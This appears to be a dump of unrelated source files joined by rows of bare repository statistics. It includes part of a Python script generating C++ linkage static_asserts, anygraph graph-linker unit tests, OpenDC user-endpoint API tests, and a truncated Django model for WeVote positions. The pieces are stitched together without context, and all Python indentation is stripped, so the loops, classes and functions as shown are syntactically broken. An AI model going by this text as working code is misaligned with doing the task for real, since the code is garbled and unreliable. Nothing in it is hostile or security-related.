TargetFile.write('static_assert(1==__zcc_linkage(test::x_'+str(i+6)+'),"x_'+str(i+6)+' has incorrect linkage");\n')
TargetFile.write('static_assert(1==__zcc_linkage(::test::x'+str(i+6)+'),"x'+str(i+6)+' has incorrect linkage");\n')
TargetFile.write('static_assert(1==__zcc_linkage(::test::x_'+str(i+6)+'),"x_'+str(i+6)+' has incorrect linkage");\n')
TargetFile.write('static_assert(1==__zcc_linkage(test2::x'+str(i+6)+'),"x'+str(i+6)+' has incorrect linkage");\n')
TargetFile.write('static_assert(1==__zcc_linkage(::test2::x'+str(i+6)+'),"x'+str(i+6)+' has incorrect linkage");\n')
for i in xrange(6):
TargetFile.write('static_assert(1==__zcc_linkage(x'+str(i+17)+'),"x'+str(i+17)+' has incorrect linkage");\n')
TargetFile.write('static_assert(1==__zcc_linkage(::x'+str(i+17)+'),"x'+str(i+17)+' has incorrect linkage");\n')
TargetFile.write('static_assert(1==__zcc_linkage(test::x'+str(i+17)+'),"x'+str(i+17)+' has incorrect linkage");\n')
TargetFile.write('static_assert(1==__zcc_linkage(test::x_'+str(i+17)+'),"x_'+str(i+17)+' has incorrect linkage");\n')
TargetFile.write('static_assert(1==__zcc_linkage(::test::x'+str(i+17)+'),"x'+str(i+17)+' has incorrect linkage");\n')
TargetFile.write('static_assert(1==__zcc_linkage(::test::x_'+str(i+17)+'),"x_'+str(i+17)+' has incorrect linkage");\n')
TargetFile.write('static_assert(1==__zcc_linkage(test2::x'+str(i+17)+'),"x'+str(i+17)+' has incorrect linkage");\n')
TargetFile.write('static_assert(1==__zcc_linkage(::test2::x'+str(i+17)+'),"x'+str(i+17)+' has incorrect linkage");\n')
for i in xrange(10):
TargetFile.write('static_assert(1==__zcc_linkage(x'+str(i+33)+'),"x'+str(i+33)+' has incorrect linkage");\n')
TargetFile.write('static_assert(1==__zcc_linkage(::x'+str(i+33)+'),"x'+str(i+33)+' has incorrect linkage");\n')
TargetFile.write('static_assert(1==__zcc_linkage(test::x'+str(i+33)+'),"x'+str(i+33)+' has incorrect linkage");\n')
TargetFile.write('static_assert(1==__zcc_linkage(test::x_'+str(i+33)+'),"x_'+str(i+33)+' has incorrect linkage");\n')
TargetFile.write('static_assert(1==__zcc_linkage(::test::x'+str(i+33)+'),"x'+str(i+33)+' has incorrect linkage");\n')
TargetFile.write('static_assert(1==__zcc_linkage(::test::x_'+str(i+33)+'),"x_'+str(i+33)+' has incorrect linkage");\n')
TargetFile.write('static_assert(1==__zcc_linkage(test2::x'+str(i+33)+'),"x'+str(i+33)+' has incorrect linkage");\n')
TargetFile.write('static_assert(1==__zcc_linkage(::test2::x'+str(i+33)+'),"x'+str(i+33)+' has incorrect linkage");\n')
for i in xrange(28):
TargetFile.write('static_assert(1==__zcc_linkage(x'+str(i+71)+'),"x'+str(i+71)+' has incorrect linkage");\n')
TargetFile.write('static_assert(1==__zcc_linkage(::x'+str(i+71)+'),"x'+str(i+71)+' has incorrect linkage");\n')
TargetFile.write('static_assert(1==__zcc_linkage(test::x'+str(i+71)+'),"x'+str(i+71)+' has incorrect linkage");\n')
TargetFile.write('static_assert(1==__zcc_linkage(test::x_'+str(i+71)+'),"x_'+str(i+71)+' has incorrect linkage");\n')
TargetFile.write('static_assert(1==__zcc_linkage(::test::x'+str(i+71)+'),"x'+str(i+71)+' has incorrect linkage");\n')
TargetFile.write('static_assert(1==__zcc_linkage(::test::x_'+str(i+71)+'),"x_'+str(i+71)+' has incorrect linkage");\n')
TargetFile.write('static_assert(1==__zcc_linkage(test2::x'+str(i+71)+'),"x'+str(i+71)+' has incorrect linkage");\n')
TargetFile.write('static_assert(1==__zcc_linkage(::test2::x'+str(i+71)+'),"x'+str(i+71)+' has incorrect linkage");\n')
TargetFile.write('#endif\n')
TargetFile.close()
if __name__ == '__main__':
for filename in target_files:
SpawnTestCase(filename)
for filename in target_files2:
SpawnTestCase2(filename)
for filename in target_files3:
SpawnTestCase3(filename)
| 49.348974
| 142
| 0.704273
| 5,230
| 33,656
| 4.311855
| 0.039388
| 0.187575
| 0.132677
| 0.118531
| 0.917609
| 0.879074
| 0.854596
| 0.819565
| 0.796683
| 0.745865
| 0
| 0.029428
| 0.098378
| 33,656
| 681
| 143
| 49.421439
| 0.713725
| 0.032
| 0
| 0.481481
| 0
| 0.001852
| 0.461975
| 0.136004
| 0
| 0
| 0
| 0
| 0.185185
| 1
| 0.022222
| false
| 0.057407
| 0
| 0.016667
| 0.038889
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
407d390fed67a9266c1e2ba06f9d0fcdd0767b34
| 14,603
|
py
|
Python
|
anygraph/unittests/test_mapping_linkers.py
|
gemerden/anygraph
|
c20cab82ad4a7f4117690a445e136c2b0e84f0f3
|
[
"MIT"
] | 10
|
2020-06-11T14:11:58.000Z
|
2021-12-31T11:59:26.000Z
|
anygraph/unittests/test_mapping_linkers.py
|
gemerden/anygraph
|
c20cab82ad4a7f4117690a445e136c2b0e84f0f3
|
[
"MIT"
] | null | null | null |
anygraph/unittests/test_mapping_linkers.py
|
gemerden/anygraph
|
c20cab82ad4a7f4117690a445e136c2b0e84f0f3
|
[
"MIT"
] | null | null | null |
import unittest
from anygraph import One, ManyMap
class TestLinkers(unittest.TestCase):
def test_many(self):
class TestMany(object):
nexts = ManyMap()
def __init__(self, name):
self.name = name
bob = TestMany('bob')
ann = TestMany('ann')
pete = TestMany('pete')
howy = TestMany('howy')
bob.nexts.include(ann, pete)
pete.nexts.include(howy)
assert list(bob.nexts) == ['ann', 'pete']
bob.nexts.rekey('ann', 'ann2')
assert list(bob.nexts) == ['ann2', 'pete']
assert bob.nexts.find_key(pete) == 'pete'
assert bob.nexts.find_key(ann) == 'ann2'
assert ann in bob.nexts.values()
assert howy in pete.nexts.values()
assert howy not in bob.nexts.values()
assert list(TestMany.nexts.iterate(bob)) == [bob, ann, pete, howy]
def test_unnamed(self):
class Test(object):
nexts = ManyMap()
bob = Test()
ann = Test()
pete = Test()
howy = Test()
bob.nexts.include(ann, pete)
pete.nexts.include(howy)
assert list(bob.nexts) == ['test_0', 'test_1']
assert list(pete.nexts) == ['test_0']
bob.nexts.exclude(ann)
assert list(bob.nexts) == ['test_1']
bob.nexts.include(ann)
assert list(bob.nexts) == ['test_1', 'test_0']
assert list(Test.nexts.iterate(bob)) == [bob, pete, howy, ann]
def test_cyclic(self):
class TestMany(object):
nexts = ManyMap(cyclic=False)
def __init__(self, name):
self.name = name
bob = TestMany('bob')
ann = TestMany('ann')
pete = TestMany('pete')
howy = TestMany('howy')
bob.nexts.include(ann, pete)
pete.nexts.include(howy)
with self.assertRaises(ValueError):
howy.nexts.include(bob)
def test_on_link(self):
on_link_results = []
on_unlink_results = []
def on_link(one, two):
on_link_results.append((one, two))
def on_unlink(one, two):
on_unlink_results.append((one, two))
class TestMany(object):
nexts = ManyMap(on_link=on_link, on_unlink=on_unlink)
def __init__(self, name):
self.name = name
bob = TestMany('bob')
ann = TestMany('ann')
pete = TestMany('pete')
howy = TestMany('howy')
bob.nexts.include(ann, pete)
pete.nexts.include(howy)
assert on_link_results == [(bob, ann), (bob, pete), (pete, howy)]
del bob.nexts
assert on_unlink_results == [(bob, ann), (bob, pete)]
def test_visitor(self):
class TestMany(object):
nexts = ManyMap()
def __init__(self, name):
self.name = name
bob = TestMany('bob')
ann = TestMany('ann')
pete = TestMany('pete')
howy = TestMany('howy')
bob.nexts.include(ann, pete)
ann.nexts.include(howy)
pete.nexts.include(howy)
people = []
def on_visit(obj):
people.append(obj)
TestMany.nexts.visit(bob, on_visit=on_visit, breadth_first=False)
assert people == [bob, ann, howy, pete]
del people[:]
TestMany.nexts.visit(bob, on_visit=on_visit, breadth_first=True)
assert people == [bob, ann, pete, howy]
def test_builder_many_by_name(self):
class TestBuilder(object):
nexts = ManyMap()
def __init__(self, name, iterable=()):
self.name = name
self.items = list(iterable)
def extend(self, *items):
self.items.extend(items)
def __iter__(self):
for item in self.items:
yield item
bob = TestBuilder('bob')
ann = TestBuilder('ann')
pete = TestBuilder('pete')
howy = TestBuilder('howy')
bob.extend(ann, pete)
pete.extend(howy, bob)
ann.extend(pete)
howy.extend(ann)
assert bob.nexts == {}
TestBuilder.nexts.build(bob)
assert bob.nexts == dict(ann=ann, pete=pete)
assert howy.nexts == dict(ann=ann)
def test_builder_many_by_func_cyclic(self):
class TestBuilder(object):
nexts = ManyMap()
def __init__(self, name, iterable=()):
self.name = name
self.items = list(iterable)
def extend(self, *items):
self.items.extend(items)
bob = TestBuilder('bob')
ann = TestBuilder('ann')
pete = TestBuilder('pete')
howy = TestBuilder('howy')
bob.extend(ann, pete)
pete.extend(howy, bob)
ann.extend(pete)
howy.extend(ann)
TestBuilder.nexts.build(bob, key=lambda obj: obj.items)
assert pete.nexts == dict(howy=howy, bob=bob)
assert howy.nexts == dict(ann=ann)
assert TestBuilder.nexts.in_cycle(bob)
assert TestBuilder.nexts.is_cyclic(bob)
def test_builder_one(self):
class TestBuilder(object):
next = One()
def __init__(self, name, other=None):
self.name = name
self.other = other
def __str__(self):
return self.name
bob = TestBuilder('bob')
ann = TestBuilder('ann')
pip = TestBuilder('pip')
bob.other = ann
ann.other = pip
assert bob.next is None
TestBuilder.next.build(bob, 'other')
assert bob.next == ann
assert ann.next == pip
class TestDoubleLinkers(unittest.TestCase):
def test_many_many(self):
class TestMany(object):
nexts = ManyMap('prevs')
prevs = ManyMap('nexts')
def __init__(self, name):
self.name = name
bob = TestMany('bob')
ann = TestMany('ann')
pete = TestMany('pete')
howy = TestMany('howy')
bob.nexts.include(ann, pete)
pete.nexts.include(howy)
assert ann in bob.nexts.values()
assert bob in ann.prevs.values()
assert howy in pete.nexts.values()
assert howy not in bob.nexts.values()
assert list(TestMany.nexts.iterate(bob)) == [bob, ann, pete, howy]
def test_one_many(self):
class TestOneMany(object):
parent = One('children')
children = ManyMap('parent')
def __init__(self, name):
self.name = name
bob = TestOneMany('bob')
ann = TestOneMany('ann')
pete = TestOneMany('pete')
howy = TestOneMany('howy')
bob.children = [ann, pete]
howy.parent = pete
assert ann in bob.children.values()
assert bob is ann.parent
assert howy in pete.children.values()
assert howy not in bob.children.values()
assert howy.parent.parent is bob
assert list(TestOneMany.children.iterate(bob)) == [bob, ann, pete, howy]
assert list(TestOneMany.parent.iterate(howy)) == [howy, pete, bob]
del bob.children
assert ann not in bob.children
assert bob is not ann.parent
assert howy.parent.parent is None
def test_pairs(self):
class Test(object):
other = One('other')
def __init__(self, name):
self.name = name
def __str__(self):
return self.name
bob = Test('bob')
ann = Test('ann')
kik = Test('kik')
bob.other = ann
assert bob.other is ann
assert ann.other is bob
assert list(Test.other.iterate(bob)) == [bob, ann]
kik.other = ann
assert bob.other is None
assert kik.other is ann
assert ann.other is kik
def test_non_directed(self):
class Test(object):
others = ManyMap('others')
def __init__(self, name):
self.name = name
def __str__(self):
return self.name
bob = Test('bob')
ann = Test('ann')
kik = Test('kik')
bob.others.include(ann)
bob.others.include(kik)
assert ann in bob.others.values()
assert kik in bob.others.values()
assert bob in ann.others.values()
assert bob in kik.others.values()
kik.others.include(ann)
assert kik in ann.others.values()
assert ann in kik.others.values()
assert ann in bob.others.values()
assert kik in bob.others.values()
assert bob in ann.others.values()
assert bob in kik.others.values()
assert list(Test.others.iterate(bob)) == [bob, ann, kik]
kik.others.exclude(ann)
assert kik not in ann.others.values()
assert ann not in kik.others.values()
assert ann in bob.others.values()
assert kik in bob.others.values()
assert bob in ann.others.values()
assert bob in kik.others.values()
def test_cyclic(self):
class TestMany(object):
nexts = ManyMap('prevs', cyclic=False)
prevs = ManyMap('nexts')
def __init__(self, name):
self.name = name
bob = TestMany('bob')
ann = TestMany('ann')
pete = TestMany('pete')
howy = TestMany('howy')
bob.nexts.include(ann, pete)
pete.nexts.include(howy)
with self.assertRaises(ValueError):
howy.nexts.include(bob)
with self.assertRaises(ValueError):
bob.prevs.include(howy)
def test_on_link(self):
on_link_results = []
on_unlink_results = []
def on_link(one, two):
on_link_results.append((one, two))
def on_unlink(one, two):
on_unlink_results.append((one, two))
class TestMany(object):
nexts = ManyMap('prevs', on_link=on_link, on_unlink=on_unlink)
prevs = ManyMap('nexts')
def __init__(self, name):
self.name = name
bob = TestMany('bob')
ann = TestMany('ann')
pete = TestMany('pete')
howy = TestMany('howy')
bob.nexts.include(ann, pete)
pete.nexts.include(howy)
assert on_link_results == [(bob, ann), (bob, pete), (pete, howy)]
del bob.nexts
assert on_unlink_results == [(bob, ann), (bob, pete)]
def test_visitor(self):
class TestMany(object):
nexts = ManyMap('prevs')
prevs = ManyMap('nexts')
def __init__(self, name):
self.name = name
bob = TestMany('bob')
ann = TestMany('ann')
pete = TestMany('pete')
howy = TestMany('howy')
bob.nexts.include(ann, pete)
ann.nexts.include(howy)
pete.nexts.include(howy)
people = []
def on_visit(obj):
people.append(obj)
TestMany.nexts.visit(bob, on_visit=on_visit, breadth_first=False)
assert people == [bob, ann, howy, pete]
del people[:]
TestMany.nexts.visit(bob, on_visit=on_visit, breadth_first=True)
assert people == [bob, ann, pete, howy]
def test_builder_many_by_name(self):
class TestBuilder(object):
nexts = ManyMap('prevs')
prevs = ManyMap('nexts')
def __init__(self, name, iterable=()):
self.name = name
self.items = list(iterable)
def extend(self, *items):
self.items.extend(items)
def __iter__(self):
for item in self.items:
yield item
def __str__(self):
return self.name
bob = TestBuilder('bob')
ann = TestBuilder('ann')
pete = TestBuilder('pete')
howy = TestBuilder('howy')
bob.extend(ann, pete)
pete.extend(howy, bob)
ann.extend(pete)
howy.extend(ann)
assert bob.nexts == {}
assert ann.prevs == {}
TestBuilder.nexts.build(bob)
assert bob.nexts == dict(ann=ann, pete=pete)
assert ann.prevs == dict(bob=bob, howy=howy)
assert howy.nexts == dict(ann=ann)
assert howy.prevs == dict(pete=pete)
def test_builder_many_by_func(self):
class TestBuilder(object):
nexts = ManyMap('prevs')
prevs = ManyMap('nexts')
def __init__(self, name, iterable=()):
self.name = name
self.items = list(iterable)
def extend(self, *items):
self.items.extend(items)
def __str__(self):
return self.name
bob = TestBuilder('bob')
ann = TestBuilder('ann')
pete = TestBuilder('pete')
howy = TestBuilder('howy')
bob.extend(ann, pete)
pete.extend(howy, bob)
ann.extend(pete)
howy.extend(ann)
assert bob.nexts == dict()
assert ann.prevs == dict()
TestBuilder.nexts.build(bob, key=lambda obj: obj.items)
assert bob.nexts == dict(ann=ann, pete=pete)
assert ann.prevs == dict(bob=bob, howy=howy)
assert howy.nexts == dict(ann=ann)
assert howy.prevs == dict(pete=pete)
def test_builder_one(self):
class TestBuilder(object):
next = One('prev')
prev = One('next')
def __init__(self, name, other=None):
self.name = name
self.other = other
def __str__(self):
return self.name
bob = TestBuilder('bob')
ann = TestBuilder('ann')
pip = TestBuilder('pip')
bob.other = ann
ann.other = pip
assert bob.next is None
assert ann.prev is None
TestBuilder.next.build(bob, 'other')
assert bob.next == ann
assert ann.prev == bob
assert ann.next == pip
assert pip.prev == ann
def test_gather(self):
class Test(object):
nexts = ManyMap('prevs')
prevs = ManyMap('nexts')
def __init__(self, name):
self.name = name
def __repr__(self):
return self.name
bob = Test('bob')
ann = Test('ann')
pete = Test('pete')
howy = Test('howy')
bob.nexts.include(ann)
ann.prevs.include(pete)
pete.nexts.include(howy, bob)
assert Test.nexts.gather(bob) == [bob, ann, pete, howy]
| 25.891844
| 80
| 0.541122
| 1,683
| 14,603
| 4.572193
| 0.05407
| 0.044704
| 0.025731
| 0.035088
| 0.837037
| 0.803769
| 0.765692
| 0.740741
| 0.729175
| 0.716699
| 0
| 0.000935
| 0.340546
| 14,603
| 563
| 81
| 25.937833
| 0.798131
| 0
| 0
| 0.770992
| 0
| 0
| 0.028156
| 0
| 0
| 0
| 0
| 0
| 0.231552
| 1
| 0.142494
| false
| 0
| 0.005089
| 0.017812
| 0.21883
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4085642f073bef22c29eb8b6f801ed4303844984
| 2,227
|
py
|
Python
|
opendc-web/opendc-web-api/opendc/api/v2/users/userId/test_endpoint.py
|
Koen1999/opendc
|
f9b43518d2d50f33077734537a477539fca9f5b7
|
[
"MIT"
] | null | null | null |
opendc-web/opendc-web-api/opendc/api/v2/users/userId/test_endpoint.py
|
Koen1999/opendc
|
f9b43518d2d50f33077734537a477539fca9f5b7
|
[
"MIT"
] | 4
|
2020-11-27T16:27:58.000Z
|
2020-12-28T23:00:08.000Z
|
opendc-web/opendc-web-api/opendc/api/v2/users/userId/test_endpoint.py
|
Koen1999/opendc
|
f9b43518d2d50f33077734537a477539fca9f5b7
|
[
"MIT"
] | null | null | null |
from opendc.util.database import DB
test_id = 24 * '1'
def test_get_user_non_existing(client, mocker):
mocker.patch.object(DB, 'fetch_one', return_value=None)
assert '404' in client.get(f'/v2/users/{test_id}').status
def test_get_user(client, mocker):
mocker.patch.object(DB, 'fetch_one', return_value={'email': 'test@test.com'})
res = client.get(f'/v2/users/{test_id}')
assert 'email' in res.json['content']
assert '200' in res.status
def test_update_user_missing_parameter(client):
assert '400' in client.put(f'/v2/users/{test_id}').status
def test_update_user_non_existing(client, mocker):
mocker.patch.object(DB, 'fetch_one', return_value=None)
assert '404' in client.put(f'/v2/users/{test_id}', json={'user': {'givenName': 'A', 'familyName': 'B'}}).status
def test_update_user_different_user(client, mocker):
mocker.patch.object(DB, 'fetch_one', return_value={'_id': test_id, 'googleId': 'other_test'})
assert '403' in client.put(f'/v2/users/{test_id}', json={'user': {'givenName': 'A', 'familyName': 'B'}}).status
def test_update_user(client, mocker):
mocker.patch.object(DB, 'fetch_one', return_value={'_id': test_id, 'googleId': 'test'})
mocker.patch.object(DB, 'update', return_value={'givenName': 'A', 'familyName': 'B'})
res = client.put(f'/v2/users/{test_id}', json={'user': {'givenName': 'A', 'familyName': 'B'}})
assert 'givenName' in res.json['content']
assert '200' in res.status
def test_delete_user_non_existing(client, mocker):
mocker.patch.object(DB, 'fetch_one', return_value=None)
assert '404' in client.delete(f'/v2/users/{test_id}').status
def test_delete_user_different_user(client, mocker):
mocker.patch.object(DB, 'fetch_one', return_value={'_id': test_id, 'googleId': 'other_test'})
assert '403' in client.delete(f'/v2/users/{test_id}').status
def test_delete_user(client, mocker):
mocker.patch.object(DB, 'fetch_one', return_value={'_id': test_id, 'googleId': 'test', 'authorizations': []})
mocker.patch.object(DB, 'delete_one', return_value={'googleId': 'test'})
res = client.delete(f'/v2/users/{test_id}', )
assert 'googleId' in res.json['content']
assert '200' in res.status
| 39.070175
| 115
| 0.690615
| 331
| 2,227
| 4.438066
| 0.1571
| 0.057182
| 0.115725
| 0.12934
| 0.82437
| 0.809394
| 0.801225
| 0.765827
| 0.721579
| 0.697073
| 0
| 0.02
| 0.124383
| 2,227
| 56
| 116
| 39.767857
| 0.733333
| 0
| 0
| 0.222222
| 0
| 0
| 0.243377
| 0
| 0
| 0
| 0
| 0
| 0.333333
| 1
| 0.25
| false
| 0
| 0.027778
| 0
| 0.277778
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4087f12b4ded9900fc343e5610480eb38b9e84c5
| 432,520
|
py
|
Python
|
position/models.py
|
mattare2/WeVoteServer
|
c12f1a4a64a94a3b22f97c9582ed1058749326d5
|
[
"MIT"
] | null | null | null |
position/models.py
|
mattare2/WeVoteServer
|
c12f1a4a64a94a3b22f97c9582ed1058749326d5
|
[
"MIT"
] | null | null | null |
position/models.py
|
mattare2/WeVoteServer
|
c12f1a4a64a94a3b22f97c9582ed1058749326d5
|
[
"MIT"
] | null | null | null |
# position/models.py
# Brought to you by We Vote. Be good.
# -*- coding: UTF-8 -*-
# Diagrams here: https://docs.google.com/drawings/d/1DsPnl97GKe9f14h41RPeZDssDUztRETGkXGaolXCeyo/edit
from analytics.models import ACTION_POSITION_TAKEN, AnalyticsManager
from candidate.models import CandidateCampaign, CandidateCampaignManager
from ballot.controllers import figure_out_google_civic_election_id_voter_is_watching
from django.core.exceptions import ObjectDoesNotExist, MultipleObjectsReturned
from django.db import models
from django.db.models import Q
from election.models import Election
from exception.models import handle_exception, handle_record_found_more_than_one_exception,\
handle_record_not_found_exception, handle_record_not_saved_exception, print_to_log
from follow.models import FollowOrganizationManager, FollowOrganizationList
from friend.models import FriendManager
from measure.models import ContestMeasure, ContestMeasureManager
from office.models import ContestOfficeManager
from organization.models import Organization, OrganizationManager
import robot_detection
from twitter.models import TwitterUser
from voter.models import fetch_voter_id_from_voter_we_vote_id, fetch_voter_we_vote_id_from_voter_id, Voter, VoterManager
from voter_guide.models import VoterGuideManager
import wevote_functions.admin
from wevote_functions.functions import convert_to_int, positive_value_exists
from wevote_settings.models import fetch_next_we_vote_id_position_integer, fetch_site_unique_id_prefix
ANY_STANCE = 'ANY_STANCE' # This is a way to indicate when we want to return any stance (support, oppose, no_stance)
SUPPORT = 'SUPPORT'
STILL_DECIDING = 'STILL_DECIDING'
NO_STANCE = 'NO_STANCE' # DALE 2016-8-29 We will want to deprecate NO_STANCE and replace with INFORMATION_ONLY
INFORMATION_ONLY = 'INFO_ONLY'
OPPOSE = 'OPPOSE'
PERCENT_RATING = 'PERCENT_RATING'
POSITION_CHOICES = (
# ('SUPPORT_STRONG', 'Strong Supports'), # I do not believe we will be offering 'SUPPORT_STRONG' as an option
(SUPPORT, 'Supports'),
(STILL_DECIDING, 'Still deciding'), # Still undecided
(NO_STANCE, 'No stance'), # We don't know the stance
(INFORMATION_ONLY, 'Information only'), # This entry is meant as food-for-thought and is not advocating
(OPPOSE, 'Opposes'),
(PERCENT_RATING, 'Percentage point rating'),
# ('OPPOSE_STRONG', 'Strongly Opposes'), # I do not believe we will be offering 'OPPOSE_STRONG' as an option
)
# friends_vs_public
FRIENDS_AND_PUBLIC = 'FRIENDS_AND_PUBLIC'
FRIENDS_ONLY = 'FRIENDS_ONLY'
PUBLIC_ONLY = 'PUBLIC_ONLY'
SHOW_PUBLIC = 'SHOW_PUBLIC'
# this_election_vs_others
THIS_ELECTION_ONLY = 'THIS_ELECTION_ONLY'
ALL_OTHER_ELECTIONS = 'ALL_OTHER_ELECTIONS'
ALL_ELECTIONS = 'ALL_ELECTIONS'
POSITION = 'POSITION'
logger = wevote_functions.admin.get_logger(__name__)
# TODO DALE Consider adding vote_smart_sig_id and vote_smart_candidate_id fields so we can export them and to prevent
# duplicate position entries from Vote Smart
class PositionEntered(models.Model):
"""
Any public position entered by any organization or candidate gets its own PositionEntered entry.
NOTE: We also have PositionForFriends table that is exactly the same structure as PositionEntered. It holds
opinions that voters only want to share with friends.
"""
# We are relying on built-in Python id field
# The we_vote_id identifier is unique across all We Vote sites, and allows us to share our org info with other
# organizations
# It starts with "wv" then we add on a database specific identifier like "3v" (WeVoteSetting.site_unique_id_prefix)
# then the string "pos", and then a sequential integer like "123".
# We keep the last value in WeVoteSetting.we_vote_id_last_position_integer
we_vote_id = models.CharField(
verbose_name="we vote permanent id", max_length=255, default=None, null=True, blank=True, unique=True)
# The id for the generated position that this PositionEntered entry influences
position_id = models.BigIntegerField(null=True, blank=True) # NOT USED CURRENTLY
test = models.BigIntegerField(null=True, blank=True)
ballot_item_display_name = models.CharField(verbose_name="text name for ballot item",
max_length=255, null=True, blank=True, db_index=True)
# We cache the url to an image for the candidate, measure or office for rapid display
ballot_item_image_url_https = models.URLField(verbose_name='url of https image for candidate, measure or office',
blank=True, null=True)
ballot_item_image_url_https_large = models.URLField(verbose_name='url of https large version image for candidate,'
' measure or office', blank=True, null=True)
ballot_item_image_url_https_medium = models.URLField(verbose_name='url of https medium version image for candidate,'
' measure or office', blank=True, null=True)
ballot_item_image_url_https_tiny = models.URLField(verbose_name='url of https tiny version image for candidate,'
' measure or office', blank=True, null=True)
ballot_item_twitter_handle = models.CharField(verbose_name='twitter screen_name for candidate, measure, or office',
max_length=255, null=True, unique=False)
# What is the organization name, voter name, or public figure name? We cache this here for rapid display
speaker_display_name = models.CharField(
verbose_name="name of the org or person with position", max_length=255, null=True, blank=True, unique=False)
# We cache the url to an image for the org, voter, or public_figure for rapid display
speaker_image_url_https = models.URLField(verbose_name='url of https image for org or person with position',
blank=True, null=True)
speaker_image_url_https_large = models.URLField(verbose_name='url of https large version image for org or '
'person with position', blank=True, null=True)
speaker_image_url_https_medium = models.URLField(verbose_name='url of https medium version image for org or '
'person with position', blank=True, null=True)
speaker_image_url_https_tiny = models.URLField(verbose_name='url of https tiny version image for org or '
'person with position', blank=True, null=True)
speaker_twitter_handle = models.CharField(verbose_name='twitter screen_name for org or person with position',
max_length=255, null=True, unique=False)
date_entered = models.DateTimeField(verbose_name='date entered', null=True, auto_now_add=True, db_index=True)
# The date the this position last changed
date_last_changed = models.DateTimeField(verbose_name='date last changed', null=True, auto_now=True)
# The organization this position is for
organization_id = models.BigIntegerField(null=True, blank=True, db_index=True)
organization_we_vote_id = models.CharField(
verbose_name="we vote permanent id for the organization", max_length=255, null=True,
blank=True, unique=False, db_index=True)
# The voter expressing the opinion
# Note that for organizations who have friends, the voter_we_vote_id is what we use to link to the friends
# (in the PositionForFriends table).
# Public positions from an organization are shared via organization_we_vote_id (in PositionEntered table), while
# friend's-only positions are shared via voter_we_vote_id.
voter_id = models.BigIntegerField(null=True, blank=True, db_index=True)
voter_we_vote_id = models.CharField(
verbose_name="we vote permanent id for the voter expressing the opinion", max_length=255, null=True,
blank=True, unique=False, db_index=True)
# The unique id of the public figure expressing the opinion. May be null if position is from org or voter
# instead of public figure.
public_figure_we_vote_id = models.CharField(
verbose_name="public figure we vote id", max_length=255, null=True, blank=True, unique=False)
# The unique ID of the election containing this contest. (Provided by Google Civic)
google_civic_election_id = models.CharField(verbose_name="google civic election id",
max_length=255, null=True, blank=False, default=0, db_index=True)
state_code = models.CharField(verbose_name="us state of the ballot item position is for",
max_length=2, null=True, blank=True)
google_civic_election_id_new = models.PositiveIntegerField(
verbose_name="google civic election id", default=0, null=True, blank=True)
# ### Values from Vote Smart ###
vote_smart_rating_id = models.BigIntegerField(null=True, blank=True, unique=False)
# Usually in one of these two formats 2015, 2014-2015
vote_smart_time_span = models.CharField(
verbose_name="the period in which the organization stated this position", max_length=255, null=True,
blank=True, unique=False)
vote_smart_rating = models.CharField(
verbose_name="vote smart value between 0-100", max_length=255, null=True,
blank=True, unique=False)
vote_smart_rating_integer = models.PositiveIntegerField(
verbose_name="vote smart value between 0-100", default=None, null=True, blank=True)
vote_smart_rating_name = models.CharField(max_length=255, null=True, blank=True, unique=False)
# The unique We Vote id of the tweet that is the source of the position
tweet_source_id = models.BigIntegerField(null=True, blank=True)
# This is the voter / authenticated user who entered the position for an organization
# (NOT the voter expressing opinion)
voter_entering_position = models.ForeignKey(
Voter, verbose_name='authenticated user who entered position', null=True, blank=True)
# The Twitter user account that generated this position
twitter_user_entered_position = models.ForeignKey(TwitterUser, null=True, verbose_name='')
# This is the office that the position refers to.
# Either contest_measure is filled, contest_office OR candidate_campaign, but not all three
contest_office_id = models.BigIntegerField(verbose_name='id of contest_office',
null=True, blank=True, db_index=True)
contest_office_we_vote_id = models.CharField(
verbose_name="we vote permanent id for the contest_office",
max_length=255, null=True, blank=True, unique=False, db_index=True)
contest_office_name = models.CharField(verbose_name="name of the office", max_length=255, null=True, blank=True)
# This is the candidate/politician that the position refers to.
# Either candidate_campaign is filled, contest_office OR contest_measure, but not all three
candidate_campaign_id = models.BigIntegerField(verbose_name='id of candidate_campaign',
null=True, blank=True, db_index=True)
candidate_campaign_we_vote_id = models.CharField(
verbose_name="we vote permanent id for the candidate_campaign", max_length=255, null=True,
blank=True, unique=False, db_index=True)
# The candidate's name as passed over by Google Civic. We save this so we can match to this candidate if an import
# doesn't include a we_vote_id we recognize.
google_civic_candidate_name = models.CharField(verbose_name="candidate name exactly as received from google civic",
max_length=255, null=True, blank=True)
# The measure's title as passed over by Google Civic. We save this so we can match to this measure if an import
# doesn't include a we_vote_id we recognize.
google_civic_measure_title = models.CharField(verbose_name="measure title exactly as received from google civic",
max_length=255, null=True, blank=True)
# Useful for queries based on Politicians -- not the main table we use for ballot display though
politician_id = models.BigIntegerField(verbose_name='', null=True, blank=True)
politician_we_vote_id = models.CharField(
verbose_name="we vote permanent id for politician", max_length=255, null=True,
blank=True, unique=False)
political_party = models.CharField(verbose_name="political party", max_length=255, null=True)
# This is the measure/initiative/proposition that the position refers to.
# Either contest_measure is filled, contest_office OR candidate_campaign, but not all three
contest_measure_id = models.BigIntegerField(verbose_name='id of contest_measure',
null=True, blank=True, db_index=True)
contest_measure_we_vote_id = models.CharField(
verbose_name="we vote permanent id for the contest_measure", max_length=255, null=True,
blank=True, unique=False, db_index=True)
# Strategic denormalization - this is redundant but will make generating the voter guide easier.
# geo = models.ForeignKey(Geo, null=True, related_name='pos_geo')
# issue = models.ForeignKey(Issue, null=True, blank=True, related_name='')
# supporting/opposing
stance = models.CharField(max_length=15, choices=POSITION_CHOICES, default=NO_STANCE, db_index=True)
